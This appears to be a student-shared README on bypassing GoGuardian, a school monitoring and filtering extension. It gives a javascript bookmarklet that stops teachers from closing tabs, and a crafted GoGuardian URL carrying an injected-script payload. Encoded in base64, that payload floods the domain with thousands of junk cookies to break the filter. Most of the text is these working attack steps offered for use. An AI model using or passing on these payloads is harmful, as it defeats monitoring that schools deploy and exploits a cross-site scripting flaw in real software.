- GoGuardian Bypasses:
Caution! Teachers can still see your screen, but they can't block or close any of your tabs.
You must have a tab limit for this to work.
- Create a bookmark named anything with this code:
javascript: window.onbeforeunload = ()=>{return false;}
- Hold down CTRL and then SPAM CLICK the bookmark until you're well above the tab limit, opening a bunch of about:blank pages.
- It might ask if you want to leave this page, this is GoGuardian trying to close it.
- Say No and click Prevent from creating additional dialogues.
- Enjoy your unblocked stay!
Close all of your about:blank tabs to undo.
found by akabutnice
This will not work if you have other extensions other than goguardian.
Go to this link in another tab
https://student.goguardian.com/teacher/blocked.html?cs=[{"name":""}, {"name":"<style>*{display:none}</style><iframe srcdoc="<script>top.eval(atob(`bGV0IGNvb2tpZXMgPSBbXTsKCmZvciAobGV0IGkgPSAwOyBpIDwgMmUzOyBpKyspIHsKICBjb29raWVzLnB1c2goewogICAgbmFtZTogYGNkJHtpfWAsCiAgICB2YWx1ZTogZW5jb2RlVVJJQ29tcG9uZW50KGJ0b2EoY3J5cHRvLmdldFJhbmRvbVZhbHVlcyhuZXcgVWludDhBcnJheSgyNSAqIDI1KSkpKSwKICAgIGV4cGlyZXM6IG5ldyBEYXRlKDJlMTQpLnRvVVRDU3RyaW5nKCksCiAgICBwYXRoOiAiLyIsCiAgICBkb21haW46IGxvY2F0aW9uLmhvc3Quc3BsaXQoIi4iKS5zbGljZSgtMikuam9pbigiLiIpCiAgfSk7Cn0KCmNvb2tpZXMgPSBjb29raWVzLm1hcChjb29raWUgPT4gYCR7Y29va2llLm5hbWV9PSR7Y29va2llLnZhbHVlfTtleHBpcmVzPSR7Y29va2llLmV4cGlyZXN9O3BhdGg9JHtjb29raWUucGF0aH07ZG9tYWluPSR7Y29va2llLmRvbWFpbn07YCk7Cgpjb29raWVzLmZvckVhY2goKGNvb2tpZSkgPT4gKGRvY3VtZW50LmNvb2tpZSA9IGNvb2tpZSkpO2hpc3RvcnkucmVwbGFjZVN0YXRlKHt9LHt9LCcvJyk==`))</script>"></iframe>"}]
There will be a white screen with nothing in it, so refresh the page
Don't worry if the GET request fails and you are left on an error screen.
Visit chrome://restart
to clear cached sites from GoGuardian.
Back to README file (The starting file)